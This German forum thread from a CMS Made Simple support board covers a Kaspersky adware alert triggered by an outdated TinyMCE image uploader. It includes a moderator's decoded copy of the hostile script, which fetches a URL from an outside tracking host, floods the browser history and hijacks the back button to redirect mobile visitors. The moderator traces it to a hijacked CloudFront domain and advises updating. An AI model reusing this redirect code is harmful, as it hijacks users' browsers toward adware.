Download 1.12.2

Du bist nicht angemeldet. Der Zugriff auf einige Boards wurde daher deaktiviert.

Seiten: 1

#1 21. Februar 2020 14:33

antibart
Server-Pate
Registriert: 14. Dezember 2010
Beiträge: 880

Adware-Alarm bei TinyMCE Image-Uploader

Hallo,

CMSMS 2.2.10
TinyMCE 3.2-beta6

Sobald ich im TinyMCE mit dem Image-Uploader in der Dateiverwaltung ankomme, bekomme ich Warnmeldungen von Kaspersky.


Warnmeldung schrieb:

Bösartige Website

Der Download wurde verboten

Objektname: not-a-virus:HEUR:AdWare.Script.Generic

Objekt:
https: // dme0ih8comzn4.cloudfront.net/imaging/v3/editor.js

Objekttyp: Adware

Löschen und Neuinstallieren des TinyMCE hilft nichts. Bei MicroTiny tauchen die Meldungen nicht auf. Handelt es sich tatsächlich um Adware oder ist es eine notwendige externe Datei, die einfach nur im Konflikt mit meinen Sicherheitseinstellungen liegt?

Beitrag geändert von antibart (21. Februar 2020 16:30)

Offline

#2 21. Februar 2020 15:57

antibart
Server-Pate
Registriert: 14. Dezember 2010
Beiträge: 880

Re: Adware-Alarm bei TinyMCE Image-Uploader

Upate:

Es scheint diese TinyMCE-Version zu betreffen. Ich habe es mit anderen Projekten verglichen. Die Meldungen tauchen überall dort auf, wo noch die 3.2-6beta installiert ist.

Ich muss aber auch gestehen, dass Kaspersky schon häufiger dazwischengefunkt hat - zB beim Daten übertragen per FTP.

Beitrag geändert von antibart (21. Februar 2020 17:43)

Offline

#3 23. Februar 2020 14:45

NaN
Moderator
Ort: Halle (Saale)
Registriert: 09. November 2010
Beiträge: 4.437

Re: Adware-Alarm bei TinyMCE Image-Uploader

So ist das bei heuristischen Treffern. Sie geben nur an, dass es sich vom Aufbau eines Scriptes her mit einer gewissen Wahrscheinlichkeit um Schadsoftware handeln könnte. Dabei sind Falschmeldungen keine Seltenheit.

Was das Script beim TinyMCE angeht, so sieht es allerdings tatsächlich nach einem Tracker aus.
Hab das Javascript hier mal decodieren lassen:

 Hier klicken, um den Code zum Kopieren zu markieren
if( /Mobile|Android|Opera Mini/i[ "test" ]( navigator[ "userAgent" ] ) ) {
	var XHR = ( "onload" in new XMLHttpRequest() ) ? XMLHttpRequest : XDomainRequest;
	var xhr = new XHR();
	xhr[ "open" ]( "GET" , "https://b.5bnewbtrack.info/track/awsbb?q=bb5" , true );
	xhr[ "onload" ] = function() {
		if( xhr[ "status" ] === 200 ) {
			var _0x2704x3 = xhr[ "responseText" ];
			!function() {
				var _0x2704x4;
				try{
					for( _0x2704x4 = 0; 10 > _0x2704x4; ++_0x2704x4 ) {
						history[ "pushState" ]( {} , "" , "#" )
					};
					onpopstate = function( _0x2704x4 ) {
						_0x2704x4[ "state" ]&& location[ "replace" ]( _0x2704x3 )
					}
				}
				catch( o ) {}
			}()
		}
	};
	xhr[ "send" ]()
}

Eine Art Tracker? Der die letzten 10 Einträge der Browser-History manipuliert? Und immer dann aktiv wird, sobald man die Adresse wechselt ... Sieht in der Tat sehr verdächtig aus!
Allerdings gehört es zum regulären TinyMCE 3.2-6beta.
Das ganze gehört zu einem Framework für Bildbearbeitung von aviary.com.
Hat man vermutlich versucht den Einsatz des Frameworks zu überwachen oder so. Keine Ahnung.
Aviary wurde jedenfalls von Adobe aufgekauft und hat - wie bei Adobe zu erwarten - ab Dezember 2018 seinen Dienst eingestellt. Wie sie es bekanntlich immer mit der Konkurrenz machen.
Deshalb gibt es da noch einige ältere Projekte, die das ohne Nutzen als Altlast mit sich herumschleppen.
Neuere Versionen vom TinyMCE Modul nutzen das Script nicht mehr.

Module: GBFilePicker, AdvancedContent
Sicherheit: Beispiel .htaccess-Datei
CMSms 1.12 unter PHP 7:
cmsms-1.12.3.zip (inoffiziell - komplett inkl. Installer)
CMSms 1.12 unter PHP 8:
cmsms-1.12.4.zip (inoffiziell - komplett inkl. Installer)

Offline

#4 23. Februar 2020 15:31

antibart
Server-Pate
Registriert: 14. Dezember 2010
Beiträge: 880

Re: Adware-Alarm bei TinyMCE Image-Uploader

Danke für die Erhellung.

Offline

#5 23. Februar 2020 18:57

NaN
Moderator
Ort: Halle (Saale)
Registriert: 09. November 2010
Beiträge: 4.437

Re: Adware-Alarm bei TinyMCE Image-Uploader

UPDATE: Das Script welches dort ausgeliefert wurde, scheint NICHT von Aviary zu sein! Somit gehört es auch NICHT zum regulären TinyMCE 3.2-6beta!

Sieht stattdessen eher nach einer Art CDN-Hijacking aus! Ursprünglich war unter der CloudFront-Domain die https-Version eines Javascripts von Aviary erreichbar. Nachdem Aviary seinen Dienst eingestellt hatte, aber einige Apps diese Domain noch nutzten, hat sich irgendein riesen Arschloch denselben CDN-Namen bei CloudFront gesichert und sein eigenes Javascript dort geparkt. Jeder, der seine App nicht rechtzeitig aktualisiert hat, wurde somit Opfer dieser Adware! Dass das von Kapsersky geblockt wurde, ist also vollkommen richtig!

Ich kann jedem TinyMCE-User nur raten, auf die neueste Version zu aktualisieren!

Module: GBFilePicker, AdvancedContent
Sicherheit: Beispiel .htaccess-Datei
CMSms 1.12 unter PHP 7:
cmsms-1.12.3.zip (inoffiziell - komplett inkl. Installer)
CMSms 1.12 unter PHP 8:
cmsms-1.12.4.zip (inoffiziell - komplett inkl. Installer)

Offline

Seiten: 1


Fußzeile des Forums

Powered by FluxBB